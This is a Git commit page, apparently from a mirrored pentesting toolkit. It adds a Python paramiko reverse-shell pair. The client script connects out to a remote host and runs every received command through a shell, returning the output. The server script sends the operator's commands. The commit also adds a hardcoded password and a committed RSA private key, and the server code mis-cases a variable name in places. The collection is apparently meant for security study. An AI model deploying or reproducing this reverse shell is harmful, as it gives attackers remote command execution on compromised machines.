Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 19:16:08 -04:00
Code Issues Packages Projects Releases Wiki Activity

paramiko server and client --> reverse shell script

Browse Source
This commit is contained in:
Mari Wahl 2014-12-17 15:59:49 -05:00
parent b0c65c456e
commit 780bec574c
4 changed files with 201 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Network_and_802.11/README.md
View File

@ -45,6 +45,8 @@
- Several scripts for SSH connections:
* ssh client
* ssh client for reverse shell
* ssh server
* ssh tunneling

86
Network_and_802.11/paramiko/ssh_client_reverse.py Executable file
View File

@ -0,0 +1,86 @@
#!/usr/bin/env python
__author__ = "bt3"
import paramiko
import sys
import getopt
import subprocess
def usage():
print "Usage: ssh_client.py <IP> -p <PORT> -u <USER> -c <COMMAND> -a <PASSWORD>"
print " -a password authentication"
print " -p specify the port"
print " -u specify the username"
print
print "Examples:"
print "ssh_client.py localhost -u buffy -p 22 -a killvampires"
sys.exit()
def ssh_client(ip, port, user, passwd):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, port=port, username=user, password=passwd)
ssh_session = client.get_transport().open_session()
if ssh_session.active:
print ssh_session.recv(1024)
while 1:
command = ssh_session.recv(1024)
try:
cmd_output = subprocess.check_output(command, shell=True)
ssh_session.send(cmd_output)
except Exception, e:
ssh_session.send(str(e))
client.close()
def main():
if not len(sys.argv[1:]):
usage()
# parse the arguments
IP = '0.0.0.0'
USER = ''
PASSWORD = ''
PORT = 0
try:
opts = getopt.getopt(sys.argv[2:],"p:u:a:", \
["PORT", "USER", "PASSWORD"])[0]
except getopt.GetoptError as err:
print str(err)
usage()
# Get user and ip
IP = sys.argv[1]
print "[*] Initializing connection to " + IP
# Handle the options and arguments
for t in opts:
if t[0] in ('-a'):
PASSWORD = t[1]
elif t[0] in ('-p'):
PORT = int(t[1])
elif t[0] in ('-u'):
USER = t[1]
else:
print "This option does not exist!"
usage()
if USER:
print "[*] User set to " + USER
if PORT:
print "[*] The port to be used is %d. " % PORT
if PASSWORD:
print "[*] A password with length %d was submitted. " %len(PASSWORD)
# start the client
ssh_client(IP, PORT, USER, PASSWORD)
if __name__ == '__main__':
main()

98
Network_and_802.11/paramiko/ssh_server.py Executable file
View File

@ -0,0 +1,98 @@
#!/usr/bin/env python
__author__ = "bt3"
import paramiko
import getopt
import threading
import sys
import socket
HOST_KEY = paramiko.RSAKey(filename='test_rsa.key')
USERNAME = 'buffy'
PASSWORD = 'killvampires'
class Server(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
if (username == USERNAME) and (password == PASSWORD):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def main():
if not len(sys.argv[1:]):
print "Usage: ssh_server.py <SERVER> <PORT>"
sys.exit(0)
# creating a socket object
server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((server, ssh_port))
sock.listen(100)
print "[+] Listening for connection ..."
client, addr = sock.accept()
except Exception, e:
print "[-] Connection Failed: " + str(e)
sys.exit(1)
print "[+] Connection Established!"
# creating a paramiko object
try:
Session = paramiko.Transport(client)
Session.add_server_key(HOST_KEY)
paramiko.util.log_to_file("filename.log")
server = Server()
try:
Session.start_server(server=server)
except paramiko.SSHException, x:
print '[-] SSH negotiation failed.'
chan = Session.accept(10)
print '[+] Authenticated!'
chan.send("Welcome to Buffy's SSH")
while 1:
try:
command = raw_input("Enter command: ").strip('\n')
if command != 'exit':
chan.send(command)
print chan.recv(1024) + '\n'
else:
chan.send('exit')
print '[*] Exiting ...'
session.close()
raise Exception('exit')
except KeyboardInterrupt:
session.close()
except Exception, e:
print "[-] Caught exception: " + str(e)
try:
session.close()
except:
pass
sys.exit(1)
if __name__ == '__main__':
main()

15
Network_and_802.11/paramiko/test_rsa.key Normal file
View File

@ -0,0 +1,15 @@
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQDTj1bqB4WmayWNPB+8jVSYpZYk80Ujvj680pOTh2bORBjbIAyz
oWGW+GUjzKxTiiPvVmxFgx5wdsFvF03v34lEVVhMpouqPAYQ15N37K/ir5XY+9m/
d8ufMCkjeXsQkKqFbAlQcnWMCRnOoPHS3I4vi6hmnDDeeYTSRvfLbW0fhwIBIwKB
gBIiOqZYaoqbeD9OS9z2K9KR2atlTxGxOJPXiP4ESqP3NVScWNwyZ3NXHpyrJLa0
EbVtzsQhLn6rF+TzXnOlcipFvjsem3iYzCpuChfGQ6SovTcOjHV9z+hnpXvQ/fon
soVRZY65wKnF7IAoUwTmJS9opqgrN6kRgCd3DASAMd1bAkEA96SBVWFt/fJBNJ9H
tYnBKZGw0VeHOYmVYbvMSstssn8un+pQpUm9vlG/bp7Oxd/m+b9KWEh2xPfv6zqU
avNwHwJBANqzGZa/EpzF4J8pGti7oIAPUIDGMtfIcmqNXVMckrmzQ2vTfqtkEZsA
4rE1IERRyiJQx6EJsz21wJmGV9WJQ5kCQQDwkS0uXqVdFzgHO6S++tjmjYcxwr3g
H0CoFYSgbddOT6miqRskOQF3DZVkJT3kyuBgU2zKygz52ukQZMqxCb1fAkASvuTv
qfpH87Qq5kQhNKdbbwbmd2NxlNabazPijWuphGTdW0VfJdWfklyS2Kr+iqrs/5wV
HhathJt636Eg7oIjAkA8ht3MQ+XSl9yIJIS8gVpbPxSw5OMfw0PjVE7tBdQruiSc
nvuQES5C9BMHjF39LZiGH1iLQy7FgdHyoP+eodI7
-----END RSA PRIVATE KEY-----